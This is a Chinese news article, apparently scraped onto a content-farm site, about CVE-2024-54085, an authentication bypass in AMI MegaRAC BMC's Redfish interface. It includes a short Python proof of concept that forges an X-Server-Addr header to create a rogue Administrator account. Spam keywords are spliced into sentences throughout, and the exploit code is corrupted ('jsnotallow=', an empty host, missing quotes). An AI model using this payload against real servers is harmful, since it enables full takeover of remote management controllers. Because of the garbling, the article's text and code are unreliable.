您现在的位置是:电脑教程 >>正文
重大漏洞警示:AMI BMC 漏洞可能导致远程认证绕过
电脑教程47人已围观
简介安全研究人员近期发现,AMI的MegaRAC软件中存在一个严重的漏洞,该漏洞可能被攻击者利用以远程绕过认证。这一漏洞编号为CVE-2024-54085,已影响众多数据中心设备和服务器型号,可能危及全球 ...
安全研究人员近期发现,漏洞漏洞AMI的警示MegaRAC软件中存在一个严重的漏洞,该漏洞可能被攻击者利用以远程绕过认证 。远程这一漏洞编号为CVE-2024-54085 ,认证绕过已影响众多数据中心设备和服务器型号 ,漏洞漏洞可能危及全球多家组织的警示云基础设施安全 。
该漏洞存在于AMI的远程基板管理控制器(BMC)软件的Redfish接口中,高防服务器波及的认证绕过设备包括HPE Cray XD670和Asus RS720A-E11-RS24U服务器等。根据安全分析,漏洞漏洞通过Shodan搜索,警示研究人员已在公共互联网上发现了大约1000个暴露在外的远程实例 。

Shodan上暴露的认证绕过实例(来源:Eclypsium)
漏洞影响范围Eclypsium的研究人员指出 ,截至2024年8月的漏洞漏洞MegaRAC版本均受到该认证绕过漏洞的香港云服务器影响 。调查显示 ,警示漏洞存在于固件文件系统中的远程host-interface-support-module.lua文件中,攻击者可通过操纵HTTP标头值来绕过安全控制 。
该漏洞的严重性不容小觑 ,当Redfish接口直接暴露在互联网上时,其CVSS评分高达10.0(CVSSv3)和10.0(CVSSv4) 。即使在Redfish访问仅限于相邻网络的环境中,亿华云CVSS评分仍高达9.6(CVSSv3)和9.4(CVSSv4)。
成功利用该漏洞的攻击者可以完全远程控制受影响的服务器 ,部署恶意软件或勒索软件,篡改固件,甚至通过过压条件物理损坏硬件 ,或制造无限重启循环,导致受害者无法恢复,除非重新配置设备。
漏洞利用细节这一漏洞的云计算根源在于Redfish接口中的输入验证不充分。漏洞代码虽然检查了HTTP标头值 ,但可以被精心设计的请求欺骗。当用户添加X-Server-Addr标头时,lighttpd Web服务器会将其结构化为用户输入 ,后跟服务器的实际地址 ,例如:
复制`X-Server-Addr: , ::ffff:1.2.3.4`1.漏洞代码使用正则表达式提取第一个冒号之前的所有内容,源码下载这意味着如果攻击者发送“169.254.0.17:”作为输入 ,系统将提取“169.254.0.17” ,从而匹配数据库值并绕过认证。
以下是一个简单的漏洞利用示例 :
复制`import requests print( json.dumps(requests.post( https://:8443/redfish/v1/AccountService/Accounts, jsnotallow={ Name: Hax0r, Password: password, UserName: demo712, RoleId: Administrator, }, verify=False, headers={ X-Server-Addr: 169.254.0.17: } ).json(), indent=2) )`1. 修复建议AMI已向OEM制造商发布了补丁 ,制造商需将这些修复措施整合到客户更新中 。建议各组织机构确保远程管理接口不对外暴露,并定期对所有服务器进行固件更新 。
Tags:
转载:欢迎各位朋友分享到网络,但转载请说明文章出处“算法与编程”。http://www.bzli.cn/news/645b399351.html
相关文章
黑客组织入侵西部数据,10TB数据遭窃
电脑教程3月份黑客曾在一次网络攻击中窃取了西部数据的敏感信息。在调查确认了此事后,西部数据已将其商店下线,并向客户发送了数据泄露通知。上周五下午,该公司通过电子邮件发送了数据泄露通知,称其数据库遭到攻击,存储 ...
【电脑教程】
阅读更多康宁线缆(解析康宁线缆的卓越性能和广泛应用领域)
电脑教程康宁线缆作为一种高品质的通信电缆产品,以其卓越的质量和稳定的性能,广泛应用于各个领域,为我们的生活和工作提供了可靠的通信保障。本文将从不同角度详细介绍康宁线缆的特点、优势以及应用领域。1.康宁线缆的概 ...
【电脑教程】
阅读更多探索酷睿i7720QM的强大性能及应用领域(领先科技下的高性能处理器——i7720QM)
电脑教程作为英特尔Intel)酷睿系列处理器的一员,i7720QM以其强大的性能和广泛的应用领域受到了广大用户的欢迎。本文将深入探讨i7720QM的性能特点、应用领域以及其在不同场景下的表现,为读者们提供一个 ...
【电脑教程】
阅读更多